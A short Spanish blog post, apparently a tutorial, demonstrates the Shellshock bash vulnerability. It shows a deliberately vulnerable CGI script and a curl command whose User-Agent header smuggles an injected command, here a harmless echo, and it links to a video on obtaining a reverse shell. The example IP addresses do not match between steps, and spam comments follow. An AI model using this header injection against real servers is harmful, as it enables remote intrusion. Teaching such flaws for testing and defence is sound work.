Aprovechando la vulnerabilidad Shellshock es posible generar un "reverse shell" para tomar control remoto de la víctima.
PoC:
1. Se tiene un CGI vulnerable. Por ejemplo: http://198.168.1.1/cgi-bin/victim.cgi
2. Código del CGI vulnerable:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Demo Shellshock Exploit (CVE-2014-6271)</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
3. En el equipo de cómputo del atacante ejecutar:
curl -A "() { foo;};echo;/bin/echo vulnerable" http://192.168.1.1/cgi-bin/victim.cgi
El siguiente videoxploit detalla la forma de obtener un "reverse shell" aprovechando Shellshock.
https://www.youtube.com/watch?v=a6FmnUSEkKM
I was more than happy to uncover this great site. I need to to thank you for your time due to this fantastic read!! I definitely enjoyed every bit of it and I have you bookmarked to see new information on your blog.
ResponderEliminarSmartsurveys4u
thanks sir
ResponderEliminarhttps://tourmypakistan.com.pk/accommodation/eden-hotel-naran/?adults=1&kids=0&rooms=1&date_from&date_to&child_ages%5B0%5D=0
Such a nice piece of information. This post has summed up of all the interesting things in a perfect way & in a single Blog. Asan Bazaar
ResponderEliminarStay connected with your TM SIM—register now in a few easy steps! Click here for a simple registration guide.Globe SIM Registration
ResponderEliminarPSA Appointment Online provides a simple way to schedule appointments for civil documents, ensuring faster service.
ResponderEliminarPSA Appointment Online for schedule
Este comentario ha sido eliminado por el autor.
ResponderEliminarEste comentario ha sido eliminado por el autor.
ResponderEliminarEste comentario ha sido eliminado por el autor.
ResponderEliminarhere is The Philippine Statistics Authority Appointment System
ResponderEliminarclick to book your appointment The Philippine Statistics Authority Appointment System